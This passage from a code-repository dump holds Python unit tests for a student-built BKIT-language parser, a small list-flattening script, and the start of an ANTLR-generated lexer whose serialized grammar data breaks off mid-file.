expect=\"\"\"successful\"\"\"\n num=265\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_call_stmt_9(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Body:\n foo(arg1, \"???\", foo(nothing), {\"asda\\\\bb\", {1,2.e2,123e1,\"nothing\"}});\n printLn();\n **print(arg);\n printStrLn(arg)**;\n read();\n EndBody.\"\"\"\n expect=\"\"\"Error on line 7 col 25: ;\"\"\"\n num=266\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_call_stmt_10(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Body:\n foo(a < b + c);\n printLn();\n **print(arg);\n printStrLn(arg)**;\n read();\n EndBody.\"\"\"\n expect=\"\"\"Error on line 7 col 25: ;\"\"\"\n num=267\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_idx_operator_1(self):\n 
input=\"\"\"Var: a,b,c;\n Function: main\n Body:\n a = b[something()[a[1]] + 1 ];\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=268\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_idx_operator_2(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Body:\n a = b[something()[a[1]] + 1][c + d < 1];\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=269\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_idx_operator_3(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Body:\n a = b[something()[a[1]] + 1][c + d < 1] + c *. d[1][21];\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=270\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_idx_operator_4(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Body:\n a = b[something()[a[1]] + 1][c + d < 1] + c *. d[1][21 * 0x21AF];\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=271\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_idx_operator_5(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Body:\n a = b[something()[a[1]] + 1][c + d < 1] + c *. d[1.][21 * 0x21Af];\n EndBody.\"\"\"\n expect=\"\"\"Error on line 4 col 71: f\"\"\"\n num=272\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_op_expr_1(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Body:\n a = a + b +. a-a-.a*a*.a\\\\b\\\\.b%!c&&a||a==b;\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=273\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_op_expr_2(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Body:\n a = (a + b) +. (a-a-.a*a*.a\\\\b\\\\.b%!c&&a||a==b;\n EndBody.\"\"\"\n expect=\"\"\"Error on line 4 col 52: ;\"\"\"\n num=274\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_op_expr_3(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Body:\n b = {{{}}};\n a = (a + b) +. 
(a-a-.a*a*.a\\\\b\\\\.b%!c&&a||a==b);\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=275\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_op_expr_4(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Body:\n b = {{{}}};\n a = (a + b) +. (a-a-.a*a*.a\\\\b\\\\.b%!c&&a||a==b) % a[1][1];\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=276\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_function_structure_1(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Body:\n Body:\n EndBody.\"\"\"\n expect=\"\"\"Error on line 4 col 8: Body\"\"\"\n num=277\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_function_structure_2(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Parameter: a < b\n Body:\n Body:\n EndBody.\"\"\"\n expect=\"\"\"Error on line 3 col 21: <\"\"\"\n num=278\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n \n def test_function_structure_3(self):\n input=\"\"\"\n Function: main,fact\n Parameter: a < b\n Body:\n Body:\n EndBody.\"\"\"\n expect=\"\"\"Error on line 2 col 22: ,\"\"\"\n num=279\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_function_structure_4(self):\n input=\"\"\"\n Function: main\n Parameter: a, b[1][100]\n Body:\n While a<b Do\n If a > b Then doNothing(); Break;\n ElseIf !somecon() Then doSomething();\n Else Do something(); While a + foo()[100] EndDo.\n EndIf.\n EndWhile.\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=280\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_function_structure_5(self):\n input=\"\"\"\n Function: main\n Parameter: a, b[1][100]\n Body:\n While a<b Do\n If a > b Then doNothing(); Break;\n ElseIf !somecon() Then doSomething();\n Else Do something(); While a + foo()[100] EndDo.\n EndIf.\n EndDo.\n EndBody.\"\"\"\n expect=\"\"\"Error on line 10 col 8: EndDo\"\"\"\n num=281\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def 
test_function_structure_6(self):\n input=\"\"\"\n Function: main\n Parameter: a, b[1][100]\n Body:\n While a<b Do\n If a > b Then doNothing(); Break;\n ElseIf !somecon() Then doSomething();\n ElseIf a \\\\ 100 -20 Then Continue;\n stop();\n Else what();\n Else Do something(); While a + foo()[100] EndDo.\n EndIf.\n EndWhile.\n EndBody.\"\"\"\n expect=\"\"\"Error on line 11 col 12: Else\"\"\"\n num=282\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_function_structure_7(self):\n input=\"\"\"\n If a > b Then doNothing(); Break;\n ElseIf !somecon() Then doSomething();\n ElseIf a \\\\ 100 -20 Then Continue;\n stop();\n Else what();\n Else Do something(); While a + foo()[100] EndDo.\n EndIf.\n Function: main\n Parameter: a, b[1][100]\n Body:\n While a<b Do\n EndWhile.\n EndBody.\"\"\"\n expect=\"\"\"Error on line 2 col 8: If\"\"\"\n num=283\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_function_structure_8(self):\n input=\"\"\"\n Function: main_123_main\n Parameter: a, b[1][100]\n Body:\n While a<b Do\n EndWhile.\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=284\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_function_structure_9(self):\n input=\"\"\"\n Function: \n Body:\n \n EndBody.\"\"\"\n expect=\"\"\"Error on line 3 col 8: Body\"\"\"\n num=285\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_function_structure_10(self):\n input=\"\"\"\n Function: nothing\n Body:\n Var: a = {1238,32412, 120};\n EndBody.\n Function: foo\n Parameter: a,b,c\n Body:\n nothing(a[1][1][b[k]]);\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=286\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_array_lit_with_expr(self):\n input=\"\"\"\n Function: foo\n Parameter: a,b,c\n Body:\n nothing(a[1][1][b[k]]);\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=287\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def 
test_while_stmt_extra(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n While statement something(); EndWhile.\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=288\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_while_stmt_extra(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n While statement something(); EndWhile.\n EndBody.\"\"\"\n expect=\"\"\"Error on line 5 col 25: something\"\"\"\n num=288\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_extra_1(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Parameter: 12e1,0.001\n Body:\n While statement something(); EndWhile.\n EndBody.\"\"\"\n expect=\"\"\"Error on line 3 col 19: 12e1\"\"\"\n num=289\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_extra_2(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n 1 == 12\n EndBody.\"\"\"\n expect=\"\"\"Error on line 5 col 8: 1\"\"\"\n num=290\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_extra_3(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n Var: a[5] = {1,4,3,2,0};\n Var: b[2][3]={{1,2,3},{4,5,6}};\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=291\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_extra_4(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n a[3 + foo(2)] = a[b[2][3]] + 4;\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=292\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_extra_5(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Parameter: a, a[1][12]\n Body:\n Var: x[1][2] = {ab,da};\n a[3 + foo(2)] = a[b[2][3]] + 4;\n EndBody.\"\"\"\n expect=\"\"\"Error on line 5 col 24: ab\"\"\"\n num=293\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_extra_6(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Parameter: a, a[1][12]\n Body:\n 
If expr Then \n ElseIf expr Then\n Else\n EndIf.\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=294\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_extra_7(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Parameter: a, a[1][12]\n Body:\n If expr Then \n ElseIf expr Then\n While expr Do EndWhile.\n Do Return; While {{}} EndDo.\n Else\n EndIf.\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=295\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_extra_8(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Parameter: a, a[1][12]\n Body:\n If expr Then \n ElseIf expr Then\n While expr Do EndWhile.\n Do Return; While {{}} EndDo.\n Else nothing(); a=(1==b+a);\n EndIf.\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=296\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_extra_9(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Parameter: a, a[1][12]\n Body:\n If expr Then \n ElseIf expr Then\n While expr Do EndWhile.\n Do Return; While {{}} EndDo.\n Else nothing(); a=1=b+a;\n EndIf.\n EndBody.\"\"\"\n expect=\"\"\"Error on line 9 col 27: =\"\"\"\n num=297\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_extra_10(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Parameter: a, a[1][12]\n Body:\n For(i=expr, a =/= {{}}, \"what is that\" + 1) Do\n EndFor.\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=298\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_extra_11(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Parameter: a, a[1][12]\n Body:\n For(i=expr, a =/= {{}, \"what is that\" + 1) Do\n EndFor.\n EndBody.\"\"\"\n expect=\"\"\"Error on line 5 col 46: +\"\"\"\n num=299\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_extra_12(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Parameter: a, a[1][12]\n Body:\n For(i=expr, a =/= {{}}, \"what is that'\"\\\\b\" + 1) Do\n Break Continue;\n 
EndFor.\n EndBody.\"\"\"\n expect=\"\"\"Error on line 6 col 14: Continue\"\"\"\n num=300\n self.assertTrue(TestParser.checkParser(input, expect, num))" }, { "alpha_fraction": 0.5966851115226746, "alphanum_fraction": 0.6436464190483093, "avg_line_length": 23.133333206176758, "blob_id": "dd1c26f8a7fdee68315fd368174b5c79695d2dea", "content_id": "60ecbdf1cbd4a49aba9d1fe6dcd04ad477088431", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 362, "license_type": "no_license", "max_line_length": 70, "num_lines": 15, "path": "/FP/Question2.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "from functools import reduce\n\ndef flatten(lsts):\n return [item for lst in lsts for item in lst]\n\ndef flatten1(lsts):\n return list(lsts[0] + flatten1(lsts[1:]) if len(lsts) > 0 else [])\n\ndef flatten2(lsts):\n return reduce(lambda x,y: x + y, lsts)\n\nstm = [[1,2,3],['a','b','c'],[1.1,2.1,3.1]]\nprint(flatten(stm))\nprint(flatten1(stm))\nprint(flatten2(stm))\n" }, { "alpha_fraction": 0.2946336567401886, "alphanum_fraction": 0.5589426159858704, "avg_line_length": 57.80607604980469, "blob_id": "07e0925f2f50a9758de1b2a04277e691ff3ca519", "content_id": "a78caa0ce9ce2681f06f81403c47994063f2834e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 25194, "license_type": "no_license", "max_line_length": 103, "num_lines": 428, "path": "/LexicalAnalysis/BKITLexer.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "# Generated from BKIT.g4 by ANTLR 4.8\nfrom antlr4 import *\nfrom io import StringIO\nfrom typing.io import TextIO\nimport sys\n\n\nfrom lexererr import *\n\n\n\ndef serializedATN():\n with StringIO() as buf:\n buf.write(\"\\3\\u608b\\ua72a\\u8133\\ub9ed\\u417c\\u3be7\\u7786\\u5964\\2E\")\n buf.write(\"\\u022f\\b\\1\\4\\2\\t\\2\\4\\3\\t\\3\\4\\4\\t\\4\\4\\5\\t\\5\\4\\6\\t\\6\\4\\7\")\n 
buf.write(\"\\t\\7\\4\\b\\t\\b\\4\\t\\t\\t\\4\\n\\t\\n\\4\\13\\t\\13\\4\\f\\t\\f\\4\\r\\t\\r\")\n buf.write(\"\\4\\16\\t\\16\\4\\17\\t\\17\\4\\20\\t\\20\\4\\21\\t\\21\\4\\22\\t\\22\\4\\23\")\n buf.write(\"\\t\\23\\4\\24\\t\\24\\4\\25\\t\\25\\4\\26\\t\\26\\4\\27\\t\\27\\4\\30\\t\\30\")\n buf.write(\"\\4\\31\\t\\31\\4\\32\\t\\32\\4\\33\\t\\33\\4\\34\\t\\34\\4\\35\\t\\35\\4\\36\")\n buf.write(\"\\t\\36\\4\\37\\t\\37\\4 \\t \\4!\\t!\\4\\\"\\t\\\"\\4#\\t#\\4$\\t$\\4%\\t%\")\n buf.write(\"\\4&\\t&\\4\\'\\t\\'\\4(\\t(\\4)\\t)\\4*\\t*\\4+\\t+\\4,\\t,\\4-\\t-\\4.\")\n buf.write(\"\\t.\\4/\\t/\\4\\60\\t\\60\\4\\61\\t\\61\\4\\62\\t\\62\\4\\63\\t\\63\\4\\64\")\n buf.write(\"\\t\\64\\4\\65\\t\\65\\4\\66\\t\\66\\4\\67\\t\\67\\48\\t8\\49\\t9\\4:\\t:\")\n buf.write(\"\\4;\\t;\\4<\\t<\\4=\\t=\\4>\\t>\\4?\\t?\\4@\\t@\\4A\\tA\\4B\\tB\\4C\\t\")\n buf.write(\"C\\4D\\tD\\4E\\tE\\4F\\tF\\4G\\tG\\4H\\tH\\4I\\tI\\4J\\tJ\\4K\\tK\\4L\\t\")\n buf.write(\"L\\4M\\tM\\4N\\tN\\4O\\tO\\4P\\tP\\4Q\\tQ\\4R\\tR\\4S\\tS\\4T\\tT\\4U\\t\")\n buf.write(\"U\\3\\2\\3\\2\\3\\2\\3\\3\\3\\3\\3\\3\\7\\3\\u00b2\\n\\3\\f\\3\\16\\3\\u00b5\")\n buf.write(\"\\13\\3\\3\\4\\3\\4\\7\\4\\u00b9\\n\\4\\f\\4\\16\\4\\u00bc\\13\\4\\3\\4\\3\")\n buf.write(\"\\4\\3\\5\\3\\5\\7\\5\\u00c2\\n\\5\\f\\5\\16\\5\\u00c5\\13\\5\\3\\5\\5\\5\\u00c8\")\n buf.write(\"\\n\\5\\3\\6\\3\\6\\3\\6\\3\\6\\7\\6\\u00ce\\n\\6\\f\\6\\16\\6\\u00d1\\13\\6\")\n buf.write(\"\\3\\6\\3\\6\\3\\6\\3\\6\\3\\6\\3\\7\\3\\7\\3\\7\\3\\7\\7\\7\\u00dc\\n\\7\\f\\7\")\n buf.write(\"\\16\\7\\u00df\\13\\7\\3\\7\\3\\7\\3\\b\\3\\b\\3\\t\\6\\t\\u00e6\\n\\t\\r\\t\")\n buf.write(\"\\16\\t\\u00e7\\3\\t\\3\\t\\3\\n\\3\\n\\3\\13\\3\\13\\3\\f\\3\\f\\3\\r\\3\\r\")\n buf.write(\"\\5\\r\\u00f4\\n\\r\\3\\16\\5\\16\\u00f7\\n\\16\\3\\17\\3\\17\\3\\17\\6\\17\")\n buf.write(\"\\u00fc\\n\\17\\r\\17\\16\\17\\u00fd\\3\\20\\3\\20\\7\\20\\u0102\\n\\20\")\n buf.write(\"\\f\\20\\16\\20\\u0105\\13\\20\\3\\21\\6\\21\\u0108\\n\\21\\r\\21\\16\\21\")\n 
buf.write(\"\\u0109\\3\\21\\3\\21\\5\\21\\u010e\\n\\21\\3\\21\\5\\21\\u0111\\n\\21\")\n buf.write(\"\\3\\22\\3\\22\\3\\22\\3\\23\\3\\23\\3\\23\\3\\24\\3\\24\\3\\24\\3\\25\\3\\25\")\n buf.write(\"\\3\\25\\5\\25\\u011f\\n\\25\\3\\26\\3\\26\\3\\27\\3\\27\\3\\30\\3\\30\\3\")\n buf.write(\"\\30\\3\\30\\5\\30\\u0129\\n\\30\\3\\30\\6\\30\\u012c\\n\\30\\r\\30\\16\")\n buf.write(\"\\30\\u012d\\3\\31\\6\\31\\u0131\\n\\31\\r\\31\\16\\31\\u0132\\3\\32\\3\")\n buf.write(\"\\32\\3\\32\\3\\32\\5\\32\\u0139\\n\\32\\3\\32\\6\\32\\u013c\\n\\32\\r\\32\")\n buf.write(\"\\16\\32\\u013d\\3\\33\\3\\33\\3\\33\\3\\33\\5\\33\\u0144\\n\\33\\3\\34\")\n buf.write(\"\\3\\34\\3\\34\\5\\34\\u0149\\n\\34\\3\\35\\3\\35\\3\\36\\3\\36\\5\\36\\u014f\")\n buf.write(\"\\n\\36\\3\\37\\3\\37\\7\\37\\u0153\\n\\37\\f\\37\\16\\37\\u0156\\13\\37\")\n buf.write(\"\\3\\37\\3\\37\\3\\37\\3 \\3 \\3 \\3 \\3 \\3!\\3!\\3!\\3!\\3!\\3!\\3\\\"\\3\")\n buf.write(\"\\\"\\3\\\"\\3\\\"\\3\\\"\\3\\\"\\3\\\"\\3\\\"\\3\\\"\\3#\\3#\\3#\\3$\\3$\\3$\\3$\\3\")\n buf.write(\"$\\3%\\3%\\3%\\3%\\3%\\3%\\3%\\3&\\3&\\3&\\3&\\3&\\3&\\3&\\3\\'\\3\\'\\3\")\n buf.write(\"\\'\\3\\'\\3\\'\\3\\'\\3(\\3(\\3(\\3(\\3(\\3(\\3(\\3)\\3)\\3)\\3)\\3)\\3)\")\n buf.write(\"\\3)\\3)\\3)\\3*\\3*\\3*\\3*\\3+\\3+\\3+\\3+\\3+\\3+\\3+\\3+\\3+\\3,\\3\")\n buf.write(\",\\3,\\3-\\3-\\3-\\3-\\3-\\3-\\3-\\3-\\3-\\3-\\3.\\3.\\3.\\3.\\3.\\3.\\3\")\n buf.write(\".\\3/\\3/\\3/\\3/\\3/\\3\\60\\3\\60\\3\\60\\3\\60\\3\\61\\3\\61\\3\\61\\3\")\n buf.write(\"\\61\\3\\61\\3\\61\\3\\62\\3\\62\\3\\62\\3\\62\\3\\62\\3\\63\\3\\63\\3\\63\")\n buf.write(\"\\3\\63\\3\\63\\3\\63\\3\\64\\3\\64\\3\\64\\3\\64\\3\\64\\3\\64\\3\\65\\3\\65\")\n buf.write(\"\\3\\66\\3\\66\\3\\66\\3\\67\\3\\67\\38\\38\\38\\39\\39\\3:\\3:\\3:\\3;\\3\")\n buf.write(\";\\3<\\3<\\3<\\3=\\3=\\3>\\3>\\3?\\3?\\3?\\3@\\3@\\3@\\3A\\3A\\3A\\3B\\3\")\n buf.write(\"B\\3B\\3C\\3C\\3D\\3D\\3E\\3E\\3E\\3F\\3F\\3F\\3G\\3G\\3G\\3G\\3H\\3H\\3\")\n 
buf.write(\"H\\3I\\3I\\3I\\3J\\3J\\3J\\3J\\3K\\3K\\3K\\3K\\3L\\3L\\3M\\3M\\3N\\3N\\3\")\n buf.write(\"O\\3O\\3P\\3P\\3Q\\3Q\\3R\\3R\\3S\\3S\\3T\\3T\\3U\\3U\\4\\u00cf\\u00dd\")\n buf.write(\"\\2V\\3\\3\\5\\4\\7\\5\\t\\6\\13\\7\\r\\b\\17\\t\\21\\n\\23\\2\\25\\2\\27\\2\")\n buf.write(\"\\31\\2\\33\\2\\35\\2\\37\\2!\\2#\\2%\\2\\'\\2)\\2+\\2-\\2/\\2\\61\\2\\63\")\n buf.write(\"\\2\\65\\13\\67\\f9\\r;\\16=\\17?\\20A\\21C\\22E\\23G\\24I\\25K\\26M\")\n buf.write(\"\\27O\\30Q\\31S\\32U\\33W\\34Y\\35[\\36]\\37_ a!c\\\"e#g$i%k&m\\'\")\n buf.write(\"o(q)s*u+w,y-{.}/\\177\\60\\u0081\\61\\u0083\\62\\u0085\\63\\u0087\")\n buf.write(\"\\64\\u0089\\65\\u008b\\66\\u008d\\67\\u008f8\\u00919\\u0093:\\u0095\")\n buf.write(\";\\u0097<\\u0099=\\u009b>\\u009d?\\u009f@\\u00a1A\\u00a3B\\u00a5\")\n buf.write(\"C\\u00a7D\\u00a9E\\3\\2\\17\\4\\3\\n\\f\\16\\17\\4\\2\\60\\60AA\\5\\2\\13\")\n buf.write(\"\\f\\16\\17\\\"\\\"\\3\\2c|\\3\\2C\\\\\\3\\2\\62;\\4\\2--//\\4\\2GGgg\\3\\2\")\n buf.write(\"\\60\\60\\t\\2))^^ddhhppttvv\\7\\2\\n\\f\\16\\17$$))^^\\5\\2\\62;C\")\n buf.write(\"Hch\\3\\2\\629\\2\\u0239\\2\\3\\3\\2\\2\\2\\2\\5\\3\\2\\2\\2\\2\\7\\3\\2\\2\")\n buf.write(\"\\2\\2\\t\\3\\2\\2\\2\\2\\13\\3\\2\\2\\2\\2\\r\\3\\2\\2\\2\\2\\17\\3\\2\\2\\2\\2\")\n buf.write(\"\\21\\3\\2\\2\\2\\2\\65\\3\\2\\2\\2\\2\\67\\3\\2\\2\\2\\29\\3\\2\\2\\2\\2;\\3\")\n buf.write(\"\\2\\2\\2\\2=\\3\\2\\2\\2\\2?\\3\\2\\2\\2\\2A\\3\\2\\2\\2\\2C\\3\\2\\2\\2\\2E\")\n buf.write(\"\\3\\2\\2\\2\\2G\\3\\2\\2\\2\\2I\\3\\2\\2\\2\\2K\\3\\2\\2\\2\\2M\\3\\2\\2\\2\\2\")\n buf.write(\"O\\3\\2\\2\\2\\2Q\\3\\2\\2\\2\\2S\\3\\2\\2\\2\\2U\\3\\2\\2\\2\\2W\\3\\2\\2\\2\")\n buf.write(\"\\2Y\\3\\2\\2\\2\\2[\\3\\2\\2\\2\\2]\\3\\2\\2\\2\\2_\\3\\2\\2\\2\\2a\\3\\2\\2\")\n buf.write(\"\\2\\2c\\3\\2\\2\\2\\2e\\3\\2\\2\\2\\2g\\3\\2\\2\\2\\2i\\3\\2\\2\\2\\2k\\3\\2\")\n buf.write(\"\\2\\2\\2m\\3\\2\\2\\2\\2o\\3\\2\\2\\2\\2q\\3\\2\\2\\2\\2s\\3\\2\\2\\2\\2u\\3\")\n 
buf.write(\"\\2\\2\\2\\2w\\3\\2\\2\\2\\2y\\3\\2\\2\\2\\2{\\3\\2\\2\\2\\2}\\3\\2\\2\\2\\2\\177\")\n buf.write(\"\\3\\2\\2\\2\\2\\u0081\\3\\2\\2\\2\\2\\u0083\\3\\2\\2\\2\\2\\u0085\\3\\2\\2\")\n buf.write(\"\\2\\2\\u0087\\3\\2\\2\\2\\2\\u0089\\3\\2\\2\\2\\2\\u008b\\3\\2\\2\\2\\2\\u008d\")\n buf.write(\"\\3\\2\\2\\2\\2\\u008f\\3\\2\\2\\2\\2\\u0091\\3\\2\\2\\2\\2\\u0093\\3\\2\\2\")\n buf.write(\"\\2\\2\\u0095\\3\\2\\2\\2\\2\\u0097\\3\\2\\2\\2\\2\\u0099\\3\\2\\2\\2\\2\\u009b\")\n buf.write(\"\\3\\2\\2\\2\\2\\u009d\\3\\2\\2\\2\\2\\u009f\\3\\2\\2\\2\\2\\u00a1\\3\\2\\2\")\n buf.write(\"\\2\\2\\u00a3\\3\\2\\2\\2\\2\\u00a5\\3\\2\\2\\2\\2\\u00a7\\3\\2\\2\\2\\2\\u00a9\")\n buf.write(\"\\3\\2\\2\\2\\3\\u00ab\\3\\2\\2\\2\\5\\u00ae\\3\\2\\2\\2\\7\\u00b6\\3\\2\\2\")\n buf.write(\"\\2\\t\\u00bf\\3\\2\\2\\2\\13\\u00c9\\3\\2\\2\\2\\r\\u00d7\\3\\2\\2\\2\\17\")\n buf.write(\"\\u00e2\\3\\2\\2\\2\\21\\u00e5\\3\\2\\2\\2\\23\\u00eb\\3\\2\\2\\2\\25\\u00ed\")\n buf.write(\"\\3\\2\\2\\2\\27\\u00ef\\3\\2\\2\\2\\31\\u00f3\\3\\2\\2\\2\\33\\u00f6\\3\")\n buf.write(\"\\2\\2\\2\\35\\u00f8\\3\\2\\2\\2\\37\\u00ff\\3\\2\\2\\2!\\u0107\\3\\2\\2\")\n buf.write(\"\\2#\\u0112\\3\\2\\2\\2%\\u0115\\3\\2\\2\\2\\'\\u0118\\3\\2\\2\\2)\\u011e\")\n buf.write(\"\\3\\2\\2\\2+\\u0120\\3\\2\\2\\2-\\u0122\\3\\2\\2\\2/\\u0128\\3\\2\\2\\2\")\n buf.write(\"\\61\\u0130\\3\\2\\2\\2\\63\\u0138\\3\\2\\2\\2\\65\\u0143\\3\\2\\2\\2\\67\")\n buf.write(\"\\u0148\\3\\2\\2\\29\\u014a\\3\\2\\2\\2;\\u014e\\3\\2\\2\\2=\\u0150\\3\")\n buf.write(\"\\2\\2\\2?\\u015a\\3\\2\\2\\2A\\u015f\\3\\2\\2\\2C\\u0165\\3\\2\\2\\2E\\u016e\")\n buf.write(\"\\3\\2\\2\\2G\\u0171\\3\\2\\2\\2I\\u0176\\3\\2\\2\\2K\\u017d\\3\\2\\2\\2\")\n buf.write(\"M\\u0184\\3\\2\\2\\2O\\u018a\\3\\2\\2\\2Q\\u0191\\3\\2\\2\\2S\\u019a\\3\")\n buf.write(\"\\2\\2\\2U\\u019e\\3\\2\\2\\2W\\u01a7\\3\\2\\2\\2Y\\u01aa\\3\\2\\2\\2[\\u01b4\")\n buf.write(\"\\3\\2\\2\\2]\\u01bb\\3\\2\\2\\2_\\u01c0\\3\\2\\2\\2a\\u01c4\\3\\2\\2\\2\")\n 
buf.write(\"c\\u01ca\\3\\2\\2\\2e\\u01cf\\3\\2\\2\\2g\\u01d5\\3\\2\\2\\2i\\u01db\\3\")\n buf.write(\"\\2\\2\\2k\\u01dd\\3\\2\\2\\2m\\u01e0\\3\\2\\2\\2o\\u01e2\\3\\2\\2\\2q\\u01e5\")\n buf.write(\"\\3\\2\\2\\2s\\u01e7\\3\\2\\2\\2u\\u01ea\\3\\2\\2\\2w\\u01ec\\3\\2\\2\\2\")\n buf.write(\"y\\u01ef\\3\\2\\2\\2{\\u01f1\\3\\2\\2\\2}\\u01f3\\3\\2\\2\\2\\177\\u01f6\")\n buf.write(\"\\3\\2\\2\\2\\u0081\\u01f9\\3\\2\\2\\2\\u0083\\u01fc\\3\\2\\2\\2\\u0085\")\n buf.write(\"\\u01ff\\3\\2\\2\\2\\u0087\\u0201\\3\\2\\2\\2\\u0089\\u0203\\3\\2\\2\\2\")\n buf.write(\"\\u008b\\u0206\\3\\2\\2\\2\\u008d\\u0209\\3\\2\\2\\2\\u008f\\u020d\\3\")\n buf.write(\"\\2\\2\\2\\u0091\\u0210\\3\\2\\2\\2\\u0093\\u0213\\3\\2\\2\\2\\u0095\\u0217\")\n buf.write(\"\\3\\2\\2\\2\\u0097\\u021b\\3\\2\\2\\2\\u0099\\u021d\\3\\2\\2\\2\\u009b\")\n buf.write(\"\\u021f\\3\\2\\2\\2\\u009d\\u0221\\3\\2\\2\\2\\u009f\\u0223\\3\\2\\2\\2\")\n buf.write(\"\\u00a1\\u0225\\3\\2\\2\\2\\u00a3\\u0227\\3\\2\\2\\2\\u00a5\\u0229\\3\")\n buf.write(\"\\2\\2\\2\\u00a7\\u022b\\3\\2\\2\\2\\u00a9\\u022d\\3\\2\\2\\2\\u00ab\\u00ac\")\n buf.write(\"\\5\\33\\16\\2\\u00ac\\u00ad\\5!\\21\\2\\u00ad\\4\\3\\2\\2\\2\\u00ae\\u00b3\")\n buf.write(\"\\5\\23\\n\\2\\u00af\\u00b2\\5\\23\\n\\2\\u00b0\\u00b2\\5\\27\\f\\2\\u00b1\")\n buf.write(\"\\u00af\\3\\2\\2\\2\\u00b1\\u00b0\\3\\2\\2\\2\\u00b2\\u00b5\\3\\2\\2\\2\")\n buf.write(\"\\u00b3\\u00b1\\3\\2\\2\\2\\u00b3\\u00b4\\3\\2\\2\\2\\u00b4\\6\\3\\2\\2\")\n buf.write(\"\\2\\u00b5\\u00b3\\3\\2\\2\\2\\u00b6\\u00ba\\7$\\2\\2\\u00b7\\u00b9\")\n buf.write(\"\\5)\\25\\2\\u00b8\\u00b7\\3\\2\\2\\2\\u00b9\\u00bc\\3\\2\\2\\2\\u00ba\")\n 